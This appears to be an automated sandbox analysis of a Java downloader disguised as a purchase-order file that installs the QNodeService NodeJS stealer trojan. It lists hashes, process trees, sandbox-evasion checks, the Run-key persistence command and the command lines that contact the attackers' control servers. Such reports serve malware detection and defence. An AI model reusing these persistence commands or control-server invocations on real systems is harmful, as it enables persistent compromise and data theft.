Analysis
-
max time kernel
117s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-07-2020 17:44
Static task
static1
Behavioral task
behavioral1
Sample
Q#5851042-5811#914915-001 PO#340437.jar
Resource
win7
Behavioral task
behavioral2
Sample
Q#5851042-5811#914915-001 PO#340437.jar
Resource
win10v200430
General
-
Target
Q#5851042-5811#914915-001 PO#340437.jar
-
Size
12KB
-
MD5
12d8527421ed9d8e2c02d7ef11840a38
-
SHA1
2d98fd24f283b6f64929bf81814e736c534e5532
-
SHA256
4f7e0ca7ff7f9079fa391eed25c8abaf5d3b86f5e64e143f1323e18a52c3ecfe
-
SHA512
9bc5597f0425544cd3ed765892f2e6f8bfa00b1f86580559dbb220f72b10fea1594721cd1b711508ce5f6a109d45eb3b471ae4c518805c52cc0e64020b14d003
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1820 wrote to memory of 1072 1820 java.exe 72 PID 1820 wrote to memory of 1072 1820 java.exe 72 PID 1072 wrote to memory of 1672 1072 node.exe 73 PID 1072 wrote to memory of 1672 1072 node.exe 73 PID 1672 wrote to memory of 1492 1672 cmd.exe 74 PID 1672 wrote to memory of 1492 1672 cmd.exe 74 PID 1072 wrote to memory of 3784 1072 node.exe 75 PID 1072 wrote to memory of 3784 1072 node.exe 75 -
Executes dropped EXE 2 IoCs
pid Process 1072 node.exe 3784 node.exe -
Loads dropped DLL 4 IoCs
pid Process 3784 node.exe 3784 node.exe 3784 node.exe 3784 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 wtfismyip.com 14 wtfismyip.com -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3784 node.exe 3784 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfc2-110.dat family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-3b197f7d = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-3b197f7d.cmd\"" reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Q#5851042-5811#914915-001 PO#340437.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://classof.theworkpc.com --central-base-url https://classof.spdns.org2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:1072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-3b197f7d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-3b197f7d.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-3b197f7d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-3b197f7d.cmd\""4⤵
- Adds Run entry to start application
PID:1492
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://classof.theworkpc.com --central-base-url https://classof.spdns.org3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3784
-
-